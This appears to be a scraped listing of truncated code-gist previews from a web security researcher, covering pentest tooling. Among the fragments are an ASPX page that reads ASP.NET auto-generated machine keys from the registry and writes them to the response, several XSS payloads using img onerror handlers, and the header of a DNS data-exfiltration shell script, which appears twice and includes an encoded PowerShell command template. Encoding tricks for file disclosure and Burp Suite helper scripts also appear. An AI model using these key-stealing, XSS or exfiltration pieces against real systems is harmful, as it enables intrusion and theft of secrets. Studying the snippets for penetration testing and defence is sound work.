# Convert from iso-8859-1, utf-8ed to binary! | |
# Useful for file disclosure when encoding can be controlled | |
# The following C# code shows an example (result is iso-8859-1, utf-8ed!): | |
###string encoding = "iso-8859-1"; | |
######string sourceFile = @"Newtonsoft.Json.dll"; | |
###### | |
######public void test() | |
######{ | |
#########System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding); | |
#########String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile; |
<%@ Page Language="C#" %> | |
<% | |
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/ | |
Response.Write("<br/><hr/>"); | |
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{}); | |
if(autoGenKeyV4!=null) | |
Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty)); | |
Response.Write("<br/>"); | |
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{}); | |
if(autoGenKey!=null) |
<img alt="<x" title="/><img src=url404 onerror=xss(0)>"> | |
<img alt=" | |
<x" title="/> | |
<img src=url404 onerror=xss(1)>"> | |
<style><style/><img src=url404 onerror=xss(2)> | |
<xmp><xmp/><img src=url404 onerror=xss(3)> |
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick, but it hasn't been tested:
outer_cmd_template="powershell -enc %CMD_B64%" |
#!/bin/bash | |
: ' | |
Usage: | |
./dns_data_exfiltration.sh "ls -lh" #the output of "ls -lh" will be exfiltrated over dns | |
Todo: | |
1. add support for powershell | |
something like the following should do the trick, but it hasn't been tested:
outer_cmd_template="powershell -enc %CMD_B64%" |
# ***********************************************replacer_for_python_scripter | |
import re,random | |
print callbacks.getToolName(toolFlag) | |
if(messageIsRequest): | |
if (callbacks.getToolName(toolFlag) == "Proxy" or callbacks.getToolName(toolFlag) == "Intruder" or callbacks.getToolName(toolFlag) == "Repeater"): | |
requestInfo = helpers.analyzeRequest(messageInfo) | |
headers = requestInfo.getHeaders() | |
msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] | |
msg = helpers.bytesToString(msgBody) |
import requests | |
import time | |
import sys | |
from base64 import b64encode | |
from requests_ntlm2 import HttpNtlmAuth | |
from urllib3.exceptions import InsecureRequestWarning | |
from urllib import quote_plus | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
// by @irsdl | |
boolean manualColorHighlightEnabled = true; // e.g. BurpRed anywhere in the request | |
boolean pwnFoxColorHighlightEnabled = true; // to support PwnFox Firefox extension containers | |
// BEGIN HIGHLIGHT LOGIC { | |
boolean hasAlreadyBeenColoured = false; | |
/* Manual highlight logic to see something like BurpRed */ | |
if(manualColorHighlightEnabled){ | |
Pattern manualHighlightPattern = Pattern.compile("burp([a-z]{3,7}+)", Pattern.CASE_INSENSITIVE); // like burpRed or burpYellow |
// by @irsdl | |
// This script identifies anomalies in how JS parses the URL using `URL(url).hostname`: | |
// 1- Characters that are ignored when present in the domain name. | |
// 2- Characters that can replace ASCII characters in domain names and still be parsed correctly. Here we are interested in the letter S in `soroush.me`
// You can try running this script in your browser's dev console or at https://www.jdoodle.com/execute-nodejs-online/ | |
// I am sure this must have been looked at before, but I cannot find a reference
for (let i = 0; i <= 0xFFFF; i++) { | |
const unicodeChar = String.fromCharCode(i); | |
const urlString = `http://sorous${unicodeChar}h.me/blog/`; |